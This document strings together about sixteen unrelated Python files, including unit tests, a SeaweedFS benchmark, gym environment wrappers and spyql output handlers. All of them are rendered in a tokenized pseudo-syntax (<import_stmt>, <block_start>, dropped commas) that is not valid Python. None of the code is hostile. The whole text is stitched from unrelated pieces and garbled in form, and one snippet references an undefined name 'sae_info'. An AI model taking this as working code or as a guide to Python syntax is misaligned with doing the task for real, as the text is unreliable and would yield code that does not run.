<import_stmt>unittest<import_from_stmt>kafka_influxdb.encoder heapster_json_encoder<class_stmt>TestHeapsterJsonEncoder(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.encoder=heapster_json_encoder.Encoder()<block_end><def_stmt>testEncoder self<block_start>msg=b'{ "MetricsName":"memory/major_page_faults","MetricsValue":{"value":56}, "MetricsTimestamp":"2017-01-19T17:26:00Z", "MetricsTags":{"container_name":"docker/9be430d3a1a28601292aebd76e15512d5471c630a7fa164d6a2a2fd9cbc19e3d"} } '<line_sep>encoded_message=self.encoder.encode(msg)<line_sep>expected_msg=['memory/major_page_faults,container_name=docker/9be430d3a1a28601292aebd76e15512d5471c630a7fa164d6a2a2fd9cbc19e3d value=56 1484846760']<line_sep>self.assertEqual(encoded_message expected_msg)<block_end><block_end>
<import_stmt>hail<as>hl<line_sep>ht=hl.utils.range_table(1_000_000 n_partitions=10_000)<line_sep># use HDFS so as not to create garbage on GS ht.write('/tmp/many_partitions.ht')<line_sep>mt=hl.utils.range_matrix_table(1_000_000 2 n_partitions=10_000)<line_sep>mt.write('/tmp/many_partitions.mt')<line_sep>
<import_stmt>numpy<as>np<import_stmt>pytest<import_stmt>elfi<def_stmt>test_sample <block_start>n_samples=10<line_sep>parameter_names=['a' 'b']<line_sep>distance_name='dist'<line_sep>samples=[np.random.random(n_samples) np.random.random(n_samples) np.random.random(n_samples)]<line_sep>outputs=dict(zip(parameter_names+[distance_name] samples))<line_sep>sample=elfi.methods.results.Sample(method_name="TestRes" outputs=outputs parameter_names=parameter_names discrepancy_name=distance_name something='x' something_else='y' n_sim=0 )<assert_stmt>sample.method_name<eq>"TestRes"<assert_stmt>hasattr(sample 'samples')<assert_stmt>sample.n_samples<eq>n_samples<assert_stmt>sample.dim<eq>len(parameter_names)<assert_stmt><not>sample.is_multivariate<assert_stmt>np.allclose(samples[0] sample.samples_array[: 0])<assert_stmt>np.allclose(samples[1] sample.samples_array[: 1])<assert_stmt>np.allclose(samples[-1] sample.discrepancies)<assert_stmt>hasattr(sample 'something')<assert_stmt>sample.something_else<eq>'y'<with_stmt>pytest.raises(AttributeError)<block_start>sample.not_here<block_end># Test summary sample.summary()<block_end><def_stmt>test_bolfi_sample <block_start>n_chains=3<line_sep>n_iters=10<line_sep>warmup=5<line_sep>parameter_names=['a' 'b']<line_sep>chains=np.random.random((n_chains n_iters len(parameter_names)))<line_sep>result=elfi.methods.results.BolfiSample(method_name="TestRes" chains=chains parameter_names=parameter_names warmup=warmup something='x' something_else='y' n_sim=0 )<assert_stmt>result.method_name<eq>"TestRes"<assert_stmt>hasattr(result 'samples')<assert_stmt>hasattr(result 'chains')<assert_stmt>hasattr(result 'outputs')<assert_stmt>result.n_samples<eq>n_chains<times>(n_iters-warmup)<assert_stmt>result.dim<eq>len(parameter_names)<assert_stmt><not>result.is_multivariate<line_sep># verify that chains are merged correctly s0=np.concatenate([chains[i warmup: 0]<for>i range(n_chains)])<line_sep>s1=np.concatenate([chains[i warmup: 1]<for>i range(n_chains)])<assert_stmt>np.allclose(s0 result.samples[parameter_names[0]])<assert_stmt>np.allclose(s1 result.samples[parameter_names[1]])<assert_stmt>hasattr(result 'something')<assert_stmt>result.something_else<eq>'y'<block_end>@pytest.mark.parametrize('multivariate_model' [3] indirect=<true>)<def_stmt>test_multivariate multivariate_model<block_start>n_samples=10<line_sep>rej=elfi.Rejection(multivariate_model['d'] batch_size=5)<line_sep>sample=rej.sample(n_samples)<assert_stmt>sample.outputs['t1'].shape<eq>(n_samples 3)<assert_stmt>sample.outputs['d'].shape<eq>(n_samples )<assert_stmt>sample.is_multivariate<block_end>
# Program 03a: Phase portrait of a linear system. # See Figure 3.8(a). <import_stmt>matplotlib.pyplot<as>plt<import_stmt>numpy<as>np<import_from_stmt>scipy.integrate odeint<import_stmt>pylab<as>pl<line_sep># The 2-dimensional linear system a,b,c,d=2 1 1 2<def_stmt>dx_dt x t<block_start><return>[a<times>x[0]+b<times>x[1] c<times>x[0]+d<times>x[1]]<block_end># Trajectories in forward time ts=np.linspace(0 4 100)<line_sep>ic=np.linspace(-1 1 5)<for_stmt>r ic<block_start><for_stmt>s ic<block_start>x0=[r s]<line_sep>xs=odeint(dx_dt x0 ts)<line_sep>plt.plot(xs[: 0] xs[: 1] 'r-')<block_end><block_end># Trajectories in backward time ts=np.linspace(0 -4 100)<line_sep>ic=np.linspace(-1 1 5)<for_stmt>r ic<block_start><for_stmt>s ic<block_start>x0=[r s]<line_sep>xs=odeint(dx_dt x0 ts)<line_sep>plt.plot(xs[: 0] xs[: 1] 'r-')<block_end><block_end># Label the axes and set fontsizes plt.xlabel('x' fontsize=15)<line_sep>plt.ylabel('y' fontsize=15)<line_sep>plt.tick_params(labelsize=15)<line_sep>plt.xlim(-1 1)<line_sep>plt.ylim(-1 1)<line_sep># Plot the vectorfield. See lines 10, 12 for system. X,Y=np.mgrid[-1:1:10j -1:1:10j]<line_sep>u=a<times>X+b<times>Y<line_sep>v=c<times>X+d<times>Y<line_sep>pl.quiver(X Y u v color='b')<line_sep>plt.show()<line_sep>
<import_from_stmt>io StringIO<import_stmt>orjson<import_from_stmt>zerver.lib.test_classes ZulipTestCase<class_stmt>ThumbnailTest(ZulipTestCase)<block_start><def_stmt>test_thumbnail_redirect self<arrow><none><block_start>self.login("hamlet")<line_sep>fp=StringIO("zulip!")<line_sep>fp.name="zulip.jpeg"<line_sep>result=self.client_post("/json/user_uploads" {"file":fp})<line_sep>self.assert_json_success(result)<line_sep>json=orjson.loads(result.content)<line_sep>self.assertIn("uri" json)<line_sep>uri=json["uri"]<line_sep>base="/user_uploads/"<line_sep>self.assertEqual(base uri[:len(base)])<line_sep>result=self.client_get("/thumbnail" {"url":uri[1:] "size":"full"})<line_sep>self.assertEqual(result.status_code 302 result)<line_sep>self.assertEqual(uri result.url)<line_sep>self.login("iago")<line_sep>result=self.client_get("/thumbnail" {"url":uri[1:] "size":"full"})<line_sep>self.assertEqual(result.status_code 403 result)<line_sep>self.assert_in_response("You are not authorized to view this file." result)<line_sep>uri="https://www.google.com/images/srpr/logo4w.png"<line_sep>result=self.client_get("/thumbnail" {"url":uri "size":"full"})<line_sep>self.assertEqual(result.status_code 302 result)<line_sep>base="https://external-content.zulipcdn.net/external_content/56c362a24201593891955ff526b3b412c0f9fcd2/68747470733a2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"<line_sep>self.assertEqual(base result.url)<line_sep>uri="http://www.google.com/images/srpr/logo4w.png"<line_sep>result=self.client_get("/thumbnail" {"url":uri "size":"full"})<line_sep>self.assertEqual(result.status_code 302 result)<line_sep>base="https://external-content.zulipcdn.net/external_content/7b6552b60c635e41e8f6daeb36d88afc4eabde79/687474703a2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"<line_sep>self.assertEqual(base result.url)<line_sep>uri="//www.google.com/images/srpr/logo4w.png"<line_sep>result=self.client_get("/thumbnail" {"url":uri "size":"full"})<line_sep>self.assertEqual(result.status_code 302 result)<line_sep>base="https://external-content.zulipcdn.net/external_content/676530cf4b101d56f56cc4a37c6ef4d4fd9b0c03/2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"<line_sep>self.assertEqual(base result.url)<block_end><block_end>
<import_stmt>pickle<import_stmt>pytest<import_stmt>numpy<as>np<import_from_stmt>astropy units<as>u<import_from_stmt>astropy modeling<import_from_stmt>specutils.utils QuantityModel<import_from_stmt>..utils.wcs_utils refraction_index vac_to_air air_to_vac<line_sep>wavelengths=[300 500 1000]<times>u.nm<line_sep>data_index_refraction={'Griesen2006':np.array([3.07393068 2.9434858 2.8925797]) 'Edlen1953':np.array([2.91557413 2.78963801 2.74148172]) 'Edlen1966':np.array([2.91554272 2.7895973 2.74156098]) 'PeckReeder1972':np.array([2.91554211 2.78960005 2.74152561]) 'Morton2000':np.array([2.91568573 2.78973402 2.74169531]) 'Ciddor1996':np.array([2.91568633 2.78973811 2.74166131])}<def_stmt>test_quantity_model <block_start>c=modeling.models.Chebyshev1D(3)<line_sep>uc=QuantityModel(c u.AA u.km)<assert_stmt>uc(10<times>u.nm).to(u.m)<eq>0<times>u.m<block_end><def_stmt>test_pickle_quantity_model tmp_path<block_start>""" Check that a QuantityModel can roundtrip through pickling, as it would if fit in a multiprocessing pool. """<line_sep>c=modeling.models.Chebyshev1D(3)<line_sep>uc=QuantityModel(c u.AA u.km)<line_sep>pkl_file=tmp_path/"qmodel.pkl"<with_stmt>open(pkl_file "wb")<as>f<block_start>pickle.dump(uc f)<block_end><with_stmt>open(pkl_file "rb")<as>f<block_start>new_model=pickle.load(f)<block_end><assert_stmt>new_model.input_units<eq>uc.input_units<assert_stmt>new_model.return_units<eq>uc.return_units<assert_stmt>type(new_model.unitless_model)<eq>type(uc.unitless_model)<assert_stmt>np.all(new_model.unitless_model.parameters<eq>uc.unitless_model.parameters)<block_end>@pytest.mark.parametrize("method" data_index_refraction.keys())<def_stmt>test_refraction_index method<block_start>tmp=(refraction_index(wavelengths method)-1)<times>1e4<assert_stmt>np.isclose(tmp data_index_refraction[method] atol=1e-7).all()<block_end>@pytest.mark.parametrize("method" data_index_refraction.keys())<def_stmt>test_air_to_vac method<block_start>tmp=refraction_index(wavelengths method)<assert_stmt>np.isclose(wavelengths.value<times>tmp air_to_vac(wavelengths method=method scheme='inversion').value rtol=1e-6).all()<assert_stmt>np.isclose(wavelengths.value air_to_vac(vac_to_air(wavelengths method=method) method=method scheme='iteration').value atol=1e-12).all()<block_end>
<import_stmt>aiohttp<import_stmt>asyncio<import_stmt>os<import_stmt>sys<import_stmt>time<import_stmt>random<import_stmt>contextlib<line_sep>seaweedfs_url='http://127.0.0.1:9081'<def_stmt>random_content <block_start><return>os.urandom(random.randint(1 10)<times>1024)<block_end><def_stmt>random_fid volumes<block_start>volume_id=random.choice(volumes)<line_sep>file_key=random.randint(0 1<lshift>24)<line_sep>file_key_hex='%x'%file_key<line_sep>cookie_hex='00000000'<line_sep><return>f'{volume_id},{file_key_hex}{cookie_hex}'<block_end><class_stmt>Reporter<block_start><def_stmt>__init__ self<block_start>self.items=[]<block_end>@contextlib.contextmanager<def_stmt>report self<block_start>t0=time.monotonic()<line_sep><yield><line_sep>value=time.monotonic()-t0<line_sep>self.items.append(value<times>1000)<block_end><def_stmt>summary self concurrency<block_start>n=len(self.items)<line_sep>s=sum(self.items)<line_sep>avg=s/n<if>n<g>0<else>0<line_sep>s_items=list(sorted(self.items))<line_sep>result=[f'avg={avg:.1f}']<line_sep>p_s=[0.5 0.8 0.9 0.95 0.99]<if_stmt>n<g>0<block_start><for_stmt>p p_s<block_start>v=s_items[int(n<times>p)]<line_sep>result.append('p{}={:.1f}'.format(int(p<times>100) v))<block_end><block_end>qps=(1000/avg)<times>concurrency<line_sep>result.append(f'qps={qps:.0f}')<line_sep>print(' '.join(result))<line_sep>self.items=[]<block_end><block_end>READER_REPORTER=Reporter()<line_sep>WRITER_REPORTER=Reporter()<async_keyword><def_stmt>put session fid:str content:bytes<block_start>url=f'{seaweedfs_url}/{fid}'<line_sep>data=aiohttp.FormData()<line_sep>data.add_field('file' content content_type='application/gzip')<async_keyword><with_stmt>session.put(url data=data)<as>response<block_start>result=<await>response.read()<line_sep><return>response.status result<block_end><block_end><async_keyword><def_stmt>get session fid:str<block_start>url=f'{seaweedfs_url}/{fid}'<async_keyword><with_stmt>session.get(url)<as>response<block_start>result=<await>response.read()<line_sep><return>response.status result<block_end><block_end><async_keyword><def_stmt>reader_task session fid_s n<block_start>fid_s=list(fid_s)<line_sep>random.shuffle(fid_s)<for_stmt>fid fid_s<block_start><with_stmt>READER_REPORTER.report()<block_start>status,r=<await>get(session fid)<assert_stmt>status<eq>200 (status r)<block_end><block_end><block_end><async_keyword><def_stmt>writer_task session fid_s n<block_start>fid_s=list(fid_s)<line_sep>random.shuffle(fid_s)<for_stmt>fid fid_s<block_start>content=random_content()<with_stmt>WRITER_REPORTER.report()<block_start>status,r=<await>put(session fid content)<assert_stmt>status<in>(200 201 204) (status r)<block_end><block_end><block_end><async_keyword><def_stmt>benchmark session num_volume num_fid num_round concurrency<block_start>volumes=list(range(20 20+num_volume))<line_sep>fid_s_s=[]<for_stmt>i range(concurrency)<block_start>fid_s=[random_fid(volumes)<for>_ range(num_fid<floordiv>concurrency)]<line_sep>fid_s_s.append(fid_s)<block_end>loop=asyncio.get_event_loop()<for_stmt>n range(num_round)<block_start>print(f'{n} '+'-'<times>60)<line_sep>writer_tasks=[]<for_stmt>i range(concurrency)<block_start>t=writer_task(session fid_s_s[i] num_round)<line_sep>writer_tasks.append(loop.create_task(t))<block_end><await>asyncio.gather(*writer_tasks)<line_sep>WRITER_REPORTER.summary(concurrency)<line_sep>reader_tasks=[]<for_stmt>i range(concurrency)<block_start>t=reader_task(session fid_s_s[i] num_round)<line_sep>reader_tasks.append(loop.create_task(t))<block_end><await>asyncio.gather(*reader_tasks)<line_sep>READER_REPORTER.summary(concurrency)<block_end><block_end><async_keyword><def_stmt>async_main num_volume concurrency<block_start>print(f'num_volume={num_volume} concurrency={concurrency}')<async_keyword><with_stmt>aiohttp.ClientSession()<as>session<block_start><await>benchmark(session num_fid=1000 num_round=3 num_volume=num_volume concurrency=concurrency )<block_end><block_end><def_stmt>main <block_start>num_volume=int(sys.argv[1])<line_sep>concurrency=int(sys.argv[2])<line_sep>loop=asyncio.get_event_loop()<line_sep>loop.run_until_complete(async_main(num_volume concurrency))<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
<import_from_stmt>enum Enum<import_from_stmt>typing Dict Any<import_from_stmt>jwt.algorithms get_default_algorithms<import_from_stmt>cryptography.hazmat._types _PRIVATE_KEY_TYPES _PUBLIC_KEY_TYPES <line_sep># custom types PrivateKey=_PRIVATE_KEY_TYPES<line_sep>PublicKey=_PUBLIC_KEY_TYPES<line_sep>JWTClaims=Dict[str Any]<class_stmt>EncryptionKeyFormat(str Enum)<block_start>""" represent the supported formats for storing encryption keys. - PEM (https://en.wikipedia.org/wiki/Privacy-Enhanced_Mail) - SSH (RFC4716) or short format (RFC4253, section-6.6, explained here: https://coolaj86.com/articles/the-ssh-public-key-format/) - DER (https://en.wikipedia.org/wiki/X.690#DER_encoding) """<line_sep>pem='pem'<line_sep>ssh='ssh'<line_sep>der='der'<block_end># dynamic enum because pyjwt does not define one # see: https://pyjwt.readthedocs.io/en/stable/algorithms.html for possible values JWTAlgorithm=Enum('JWTAlgorithm' [(k k)<for>k get_default_algorithms().keys()])<line_sep>
# Copyright BigchainDB GmbH and BigchainDB contributors # SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0) # Code is Apache-2.0 and docs are CC-BY-4.0 <class_stmt>BigchainDBError(Exception)<block_start>"""Base class for BigchainDB exceptions."""<block_end><class_stmt>CriticalDoubleSpend(BigchainDBError)<block_start>"""Data integrity error that requires attention"""<block_end>
<import_from_stmt>semantic_text_similarity.models ClinicalBertSimilarity<import_from_stmt>scipy.stats pearsonr<line_sep>model=ClinicalBertSimilarity()<line_sep>predictions=model.predict([("The patient is sick." "Grass is green.") ("A prescription of acetaminophen 325 mg was given." " The patient was given Tylenol.")])<line_sep>print(predictions)<line_sep>
""" 该代码仅为演示函数签名所用,并不能实际运行 """<line_sep>save_info={# 保存的信息 "iter_num":iter_num # 迭代步数 "optimizer":optimizer.state_dict() # 优化器的状态字典 "model":model.state_dict() # 模型的状态字典 }<line_sep># 保存信息 torch.save(save_info save_path)<line_sep># 载入信息 save_info=torch.load(save_path)<line_sep>optimizer.load_state_dict(save_info["optimizer"])<line_sep>model.load_state_dict(sae_info["model"])<line_sep>
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Environment wrappers."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>gym<import_stmt>numpy<as>np<import_from_stmt>PIL Image<import_from_stmt>world_models.utils nested<class_stmt>ObservationDict(gym.Wrapper)<block_start>"""Changes the observation space to be a dict."""<def_stmt>__init__ self env key='observ'<block_start>self._key=key<line_sep>self.env=env<block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self.env name)<block_end>@property<def_stmt>observation_space self<block_start>spaces={self._key:self.env.observation_space}<line_sep><return>gym.spaces.Dict(spaces)<block_end>@property<def_stmt>action_space self<block_start><return>self.env.action_space<block_end><def_stmt>step self action<block_start>obs,reward,done,info=self.env.step(action)<line_sep>obs={self._key:np.array(obs)}<line_sep><return>obs reward done info<block_end><def_stmt>reset self<block_start>obs=self.env.reset()<line_sep>obs={self._key:np.array(obs)}<line_sep><return>obs<block_end><block_end><class_stmt>ActionRepeat(gym.Wrapper)<block_start>"""Repeats the same action `n` times and returns the last step results."""<def_stmt>__init__ self env n<block_start>super(ActionRepeat self).__init__(env)<assert_stmt>n<ge>1<line_sep>self._n=n<block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self.env name)<block_end><def_stmt>step self action<block_start>done=<false><line_sep>total_reward=0<line_sep>current_step=0<while_stmt>current_step<l>self._n<and><not>done<block_start>observ,reward,done,info=self.env.step(action)<line_sep>total_reward<augadd>reward<line_sep>current_step<augadd>1<block_end><return>observ total_reward done info<block_end><block_end><class_stmt>ActionNormalize(gym.Env)<block_start>"""Normalizes the action space."""<def_stmt>__init__ self env<block_start>self._env=env<line_sep>self._mask=np.logical_and(np.isfinite(env.action_space.low) np.isfinite(env.action_space.high))<line_sep>self._low=np.where(self._mask env.action_space.low -1)<line_sep>self._high=np.where(self._mask env.action_space.high 1)<block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self._env name)<block_end>@property<def_stmt>action_space self<block_start>low=np.where(self._mask -np.ones_like(self._low) self._low)<line_sep>high=np.where(self._mask np.ones_like(self._low) self._high)<line_sep><return>gym.spaces.Box(low high dtype=np.float32)<block_end><def_stmt>step self action<block_start>original=(action+1)/2<times>(self._high-self._low)+self._low<line_sep>original=np.where(self._mask original action)<line_sep><return>self._env.step(original)<block_end><def_stmt>reset self<block_start><return>self._env.reset()<block_end><def_stmt>render self mode='human'<block_start><return>self._env.render(mode=mode)<block_end><block_end><class_stmt>MaximumDuration(gym.Wrapper)<block_start>"""Force sets `done` after the specified duration."""<def_stmt>__init__ self env duration<block_start>super(MaximumDuration self).__init__(env)<line_sep>self._duration=duration<line_sep>self._step=<none><block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self.env name)<block_end><def_stmt>step self action<block_start><if_stmt>self._step<is><none><block_start><raise>RuntimeError('Must reset environment.')<block_end>observ,reward,done,info=self.env.step(action)<line_sep>self._step<augadd>1<if_stmt>self._step<ge>self._duration<block_start>done=<true><line_sep>self._step=<none><block_end><return>observ reward done info<block_end><def_stmt>reset self<block_start>self._step=0<line_sep><return>self.env.reset()<block_end><block_end><class_stmt>MinimumDuration(gym.Wrapper)<block_start>"""Force resets `done` before the specified duration."""<def_stmt>__init__ self env duration<block_start>super(MinimumDuration self).__init__(env)<line_sep>self._duration=duration<line_sep>self._step=<none><block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self.env name)<block_end><def_stmt>step self action<block_start>observ,reward,done,info=self.env.step(action)<line_sep>self._step<augadd>1<if_stmt>self._step<l>self._duration<block_start>done=<false><block_end><return>observ reward done info<block_end><def_stmt>reset self<block_start>self._step=0<line_sep><return>self.env.reset()<block_end><block_end><class_stmt>ConvertTo32Bit(gym.Wrapper)<block_start>"""Converts observation and rewards to int/float32."""<def_stmt>__getattr__ self name<block_start><return>getattr(self.env name)<block_end><def_stmt>step self action<block_start>observ,reward,done,info=self.env.step(action)<line_sep>observ=nested.map(self._convert_observ observ)<line_sep>reward=self._convert_reward(reward)<line_sep><return>observ reward done info<block_end><def_stmt>reset self<block_start>observ=self.env.reset()<line_sep>observ=nested.map(self._convert_observ observ)<line_sep><return>observ<block_end><def_stmt>_convert_observ self observ<block_start><if_stmt><not>np.isfinite(observ).all()<block_start><raise>ValueError('Infinite observation encountered.')<block_end><if_stmt>observ.dtype<eq>np.float64<block_start><return>observ.astype(np.float32)<block_end><if_stmt>observ.dtype<eq>np.int64<block_start><return>observ.astype(np.int32)<block_end><return>observ<block_end><def_stmt>_convert_reward self reward<block_start><if_stmt><not>np.isfinite(reward).all()<block_start><raise>ValueError('Infinite reward encountered.')<block_end><return>np.array(reward dtype=np.float32)<block_end><block_end><class_stmt>RenderObservation(gym.Env)<block_start>"""Changes the observation space to rendered frames."""<def_stmt>__init__ self env size=(64 64) dtype=np.uint8 key='image'<block_start><assert_stmt>isinstance(env.observation_space gym.spaces.Dict)<line_sep>self.env=env<line_sep>self._size=size<line_sep>self._dtype=dtype<line_sep>self._key=key<block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self.env name)<block_end>@property<def_stmt>observation_space self<block_start>high={np.uint8:255 np.float:1.0}[self._dtype]<line_sep>image=gym.spaces.Box(0 high self._size+(3 ) dtype=self._dtype)<line_sep>spaces=self.env.observation_space.spaces.copy()<assert_stmt>self._key<not><in>spaces<line_sep>spaces[self._key]=image<line_sep><return>gym.spaces.Dict(spaces)<block_end>@property<def_stmt>action_space self<block_start><return>self.env.action_space<block_end><def_stmt>step self action<block_start>obs,reward,done,info=self.env.step(action)<line_sep>obs[self._key]=self._render_image()<line_sep><return>obs reward done info<block_end><def_stmt>reset self<block_start>obs=self.env.reset()<line_sep>obs[self._key]=self._render_image()<line_sep><return>obs<block_end><def_stmt>_render_image self<block_start>"""Renders the environment and processes the image."""<line_sep>image=self.env.render('rgb_array')<if_stmt>image.shape[:2]<ne>self._size<block_start>image=np.array(Image.fromarray(image).resize(self._size))<block_end><if_stmt>self._dtype<and>image.dtype<ne>self._dtype<block_start><if_stmt>image.dtype<in>(np.float32 np.float64)<and>self._dtype<eq>np.uint8<block_start>image=(image<times>255).astype(self._dtype)<block_end><elif_stmt>image.dtype<eq>np.uint8<and>self._dtype<in>(np.float32 np.float64)<block_start>image=image.astype(self._dtype)/255<block_end><else_stmt><block_start>message='Cannot convert observations from {} to {}.'<line_sep><raise>NotImplementedError(message.format(image.dtype self._dtype))<block_end><block_end><return>image<block_end><block_end><class_stmt>DeepMindEnv(gym.Env)<block_start>"""Wrapper for deepmind MuJoCo environments to expose gym env methods."""<line_sep>metadata={'render.modes':['rgb_array']}<line_sep>reward_range=(-np.inf np.inf)<def_stmt>__init__ self env render_size=(64 64) camera_id=0<block_start>self._env=env<line_sep>self._render_size=render_size<line_sep>self._camera_id=camera_id<block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self._env name)<block_end>@property<def_stmt>observation_space self<block_start>components={}<for_stmt>key,value self._env.observation_spec().items()<block_start>components[key]=gym.spaces.Box(-np.inf np.inf value.shape dtype=np.float32)<block_end><return>gym.spaces.Dict(components)<block_end>@property<def_stmt>action_space self<block_start>action_spec=self._env.action_spec()<line_sep><return>gym.spaces.Box(action_spec.minimum action_spec.maximum dtype=np.float32)<block_end><def_stmt>step self action<block_start>time_step=self._env.step(action)<line_sep>obs=dict(time_step.observation)<line_sep>reward=time_step.reward<or>0<line_sep>done=time_step.last()<line_sep>info={'discount':time_step.discount}<line_sep><return>obs reward done info<block_end><def_stmt>reset self<block_start>time_step=self._env.reset()<line_sep><return>dict(time_step.observation)<block_end><def_stmt>render self *args **kwargs<block_start><if_stmt>kwargs.get('mode' 'rgb_array')<ne>'rgb_array'<block_start><raise>ValueError("Only render mode 'rgb_array' is supported.")<block_end><del_stmt>args# Unused <del_stmt>kwargs# Unused <return>self._env.physics.render(*self._render_size camera_id=self._camera_id)<block_end><def_stmt>get_state self<block_start><return>(np.array(self.physics.data.qpos) np.array(self.physics.data.qvel) np.array(self.physics.data.ctrl) np.array(self.physics.data.act))<block_end><def_stmt>set_state self state<block_start><with_stmt>self.physics.reset_context()<block_start>self.physics.data.qpos[:]=state[0]<line_sep>self.physics.data.qvel[:]=state[1]<line_sep>self.physics.data.ctrl[:]=state[2]<line_sep>self.physics.data.act[:]=state[3]<block_end><block_end><block_end>
<import_from_stmt>pytorch_pfn_extras.distributed._dataset_util create_distributed_subset_indices# NOQA
# coding: utf8 <import_from_future_stmt> unicode_literals<import_from_stmt>.lightnet Network Image BoxLabels<import_from_stmt>.about __version__<def_stmt>load name path=<none><block_start><return>Network.load(name path=path)<block_end>
<import_from_stmt>spyql.nulltype Null<class_stmt>OutputHandler<block_start>"""Mediates data processing with data writting"""<line_sep>@staticmethod<def_stmt>make_handler prs<block_start>""" Chooses the right handler depending on the kind of query and eventual optimization opportunities """<if_stmt>prs["group by"]<and><not>prs["partials"]<block_start><return>GroupByDelayedOutSortAtEnd(prs["order by"] prs["limit"] prs["offset"])<block_end><if_stmt>prs["order by"]# TODO optimization: use special handler that only keeps the top n elements # in memory when LIMIT is defined <block_start><if_stmt>prs["distinct"]<block_start><return>DistinctDelayedOutSortAtEnd(prs["order by"] prs["limit"] prs["offset"])<block_end><return>DelayedOutSortAtEnd(prs["order by"] prs["limit"] prs["offset"])<block_end><if_stmt>prs["distinct"]<block_start><return>LineInDistinctLineOut(prs["limit"] prs["offset"])<block_end><return>LineInLineOut(prs["limit"] prs["offset"])<block_end><def_stmt>__init__ self limit offset<block_start>self.limit=limit<line_sep>self.rows_written=0<line_sep>self.offset=offset<if>offset<else>0<block_end><def_stmt>set_writer self writer<block_start>self.writer=writer<block_end><def_stmt>handle_result self result group_key sort_keys<block_start>""" To be implemented by child classes to handle a new output row (aka result). All inputs should be tuples. """<line_sep><return>self.is_done()<block_end><def_stmt>is_done self# premature ending <block_start><return>self.limit<is><not><none><and>self.rows_written<ge>self.limit<block_end><def_stmt>write self row<block_start><if_stmt>self.offset<g>0<block_start>self.offset=self.offset-1<block_end><else_stmt><block_start>self.writer.writerow(row)<line_sep>self.rows_written=self.rows_written+1<block_end><block_end><def_stmt>finish self<block_start>self.writer.flush()<block_end><block_end><class_stmt>LineInLineOut(OutputHandler)<block_start>"""Simple handler that immediately writes every processed row"""<def_stmt>handle_result self result *_<block_start>self.write(result)<line_sep><return>self.is_done()<block_end><def_stmt>finish self<block_start>super().finish()<block_end><block_end><class_stmt>LineInDistinctLineOut(OutputHandler)<block_start>"""In-memory distinct handler that immediately writes every non-duplicated row"""<def_stmt>__init__ self limit offset<block_start>super().__init__(limit offset)<line_sep>self.output_rows=set()<block_end><def_stmt>handle_result self result *_# uses a dict to store distinct results instead of storing all rows <block_start><if_stmt>result<in>self.output_rows<block_start><return><false><block_end># duplicate self.output_rows.add(result)<line_sep>self.write(result)<line_sep><return>self.is_done()<block_end><def_stmt>finish self<block_start>super().finish()<block_end><block_end><class_stmt>DelayedOutSortAtEnd(OutputHandler)<block_start>""" Only writes after collecting and sorting all data. Temporary implementation that reads every processed row into memory. """<def_stmt>__init__ self orderby limit offset<block_start>super().__init__(limit offset)<line_sep>self.orderby=orderby<line_sep>self.output_rows=[]<block_end><def_stmt>handle_result self result sort_keys *_<block_start>self.output_rows.append({"data":result "sort_keys":sort_keys})<line_sep># TODO use temporary files to write `output_rows` whenever it gets too large # TODO sort intermediate results before writing to a temporary file <return><false><block_end># no premature endings here <def_stmt>finish self# TODO read and merge previously sorted temporary files (look into heapq.merge) # 1. sorts everything <block_start><if_stmt>self.orderby<block_start><for_stmt>i reversed(range(len(self.orderby)))# taking advantage of list.sort being stable to sort elements from minor # to major criteria (not be the most efficient way but straightforward) <block_start>self.output_rows.sort(key=<lambda>row:(# handle of NULLs based on NULLS FIRST/LAST specification (row["sort_keys"][i]<is>Null)<ne>self.orderby[i]["rev_nulls"] row["sort_keys"][i] ) reverse=self.orderby[i]["rev"] # handles ASC/DESC order )<block_end><block_end># 2. writes sorted rows to output <for_stmt>row self.output_rows# it would be more efficient to slice `output_rows` based on limit/offset # however, this is more generic with less repeated logic and this is a # temporary implementation <block_start><if_stmt>self.is_done()<block_start><break><block_end>self.write(row["data"])<block_end>super().finish()<block_end><block_end><class_stmt>GroupByDelayedOutSortAtEnd(DelayedOutSortAtEnd)<block_start>""" Extends `DelayedOutSortAtEnd` to only store intermediate group by results instead of keeping all rows in memory """<def_stmt>__init__ self orderby limit offset<block_start>super().__init__(orderby limit offset)<line_sep>self.output_rows=dict()<block_end><def_stmt>handle_result self result sort_keys group_key# uses a dict to store intermidiate group by results instead of storing all rows <block_start>self.output_rows[group_key]={"data":result "sort_keys":sort_keys}<line_sep><return><false><block_end># no premature endings here <def_stmt>finish self# converts output_rows dict to list so that it can be sorted and written <block_start>self.output_rows=list(self.output_rows.values())<line_sep>super().finish()<block_end><block_end><class_stmt>DistinctDelayedOutSortAtEnd(DelayedOutSortAtEnd)<block_start>""" Alters `DelayedOutSortAtEnd` to only store distinct results instead of keeping all rows in memory """<def_stmt>__init__ self orderby limit offset<block_start>super().__init__(orderby limit offset)<line_sep>self.output_rows=dict()<block_end><def_stmt>handle_result self result sort_keys *_# uses a dict to store distinct results instead of storing all rows <block_start><if_stmt>result<not><in>self.output_rows<block_start>self.output_rows[result]=sort_keys<block_end><return><false><block_end># no premature endings here <def_stmt>finish self# converts output_rows dict to list so that it can be sorted and written <block_start>self.output_rows=[{"data":k "sort_keys":v}<for>k,v self.output_rows.items()]<line_sep>super().finish()<block_end><block_end>
